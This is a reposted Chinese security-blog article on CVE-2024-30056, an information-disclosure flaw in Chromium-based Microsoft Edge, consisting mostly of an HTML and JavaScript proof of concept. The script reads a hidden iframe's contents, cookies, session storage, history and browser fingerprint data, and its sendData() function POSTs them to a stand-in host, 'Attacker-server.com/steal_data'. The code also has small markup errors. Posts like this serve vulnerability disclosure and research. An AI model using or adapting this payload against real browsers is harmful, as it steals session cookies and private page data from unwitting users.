CVE-2024-30056 Microsoft Edge(基于 Chromium)信息泄露漏洞

admin 2024年5月31日09:15:01评论59 views字数 3335阅读11分7秒阅读模式

CVE-2024-30056 Microsoft Edge(基于 Chromium)信息泄露漏洞

CVE-2024-30056 是一个关于 Microsoft Edge (Chromium-based) 的信息泄露漏洞。这个漏洞的重要性被评为 Important,最高安全性危险等级为 7.1,属于需要网络攻击向量、低攻击复杂性、无需特权、需要用户交互的漏洞。

用户需要点击一个特制的 URL 才能受到攻击者的威胁。成功利用该漏洞可能会导致一定程度的机密性丧失,即攻击者可以获取与受影响的 URL 相关的浏览器中的有限信息。此外,漏洞还可能导致一定程度的完整性丧失,攻击者可以修改有漏洞的链接的内容,将受害者重定向到恶意网站。

POC:

<!DOCTYPE html><html><head>    <title>PoC CVE-2024-30056</title>    <style>        body {            font-family: Arial, sans-serif;            margin: 20px;        }        h1 {            color: #333;        }        pre {            background-color: #f5f5f5;            padding: 10px;            border: 1px solid #ddd;            overflow: auto;        }        button {            padding: 10px 20px;            background-color: #007bff;            color: #fff;            border: none;            border-radius: 5px;            cursor: pointer;        }        button:hover {            background-color: #0056b3;        }</style></head><body>    <h1> Poc CVE-2024-30056</h1>    <iframe id="targetIframe" src="http://localhost/sensitive_page.html" style="display:none;"></iframe>    <script>        document.getElementById('targetIframe').onload = function() {            try {                let iframeDocument = document.getElementById('targetIframe').contentWindow.document;                let sensitiveData = btoa(encodeURIComponent(escape(iframeDocument.documentElement.innerHTML)));                 let cookies = btoa(encodeURIComponent(escape(document.cookie)));                 let sessions = btoa(encodeURIComponent(escape(JSON.stringify(sessionStorage))));                 let browsingHistory = btoa(encodeURIComponent(escape(JSON.stringify(history))));                 let browserData = {                    userAgent: navigator.userAgent,                    platform: navigator.platform,                    language: navigator.language,                    plugins: [],                    mimeTypes: [],                    screen: {                        width: window.screen.width,                        height: window.screen.height,                        colorDepth: window.screen.colorDepth                    },                    timezoneOffset: new Date().getTimezoneOffset()                };                for (let i = 0; i < navigator.plugins.length; i++) {                    browserData.plugins.push({                        name: navigator.plugins[i].name,                        filename: navigator.plugins[i].filename,                        description: navigator.plugins[i].description                    });                }                for (let i = 0; i < navigator.mimeTypes.length; i++) {                    browserData.mimeTypes.push({                        type: navigator.mimeTypes[i].type,                        description: navigator.mimeTypes[i].description,                        suffixes: navigator.mimeTypes[i].suffixes                    });                }                let popup = window.open("", "Sensitive Data", "width=600,height=600");                popup.document.write("<h1>Sensitive Data</h1>");                popup.document.write("<pr>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(sensitiveData)))) + "</pr>"));                popup.document.write("<h2>Cookies:</h2>");                popup.document.write("<pre>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(cookies)))) + "</pre>"));                popup.document.write("<h2>User Sessions:</h2>");popup.document.write("<pre>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(sessions)))) + "</pre>"));                popup.document.write("<h2>Browsing History:</h2>");                popup.document.write("<pre>" + decodeURIComponent(unescape(atob(decodeURIComponent(unescape(browsingHistory)))) + "</pre>"));                popup.document.write("<h2>Browser Information:</h2>");                popup.document.write("<pre>" + JSON.stringify(browserData, null, 2) + "</pre>");                popup.document.write("<button onclick="sendData()">Send Data </button>");                function sendData() {                    let xhr = new XMLHttpRequest();                    xhr.open("POST", "http://Attacker-server.com/steal_data", true);                    xhr.setRequestHeader("Content-Type", "application/json");                    xhr.send(JSON.stringify({ sensitiveData: sensitiveData, cookies: cookies, sessions: sessions, browsingHistory: browsingHistory }));                    alert("Stolen data has been sent to the malicious server!");                }            } catch (error) {                console.error('Error accessing iframe content:', error);            }        };</script></body></html>

CVE-2024-30056 Microsoft Edge(基于 Chromium)信息泄露漏洞

https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure

原文始发于微信公众号(Ots安全):CVE-2024-30056 Microsoft Edge(基于 Chromium)信息泄露漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月31日09:15:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-30056 Microsoft Edge(基于 Chromium)信息泄露漏洞https://cn-sec.com/archives/2788105.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息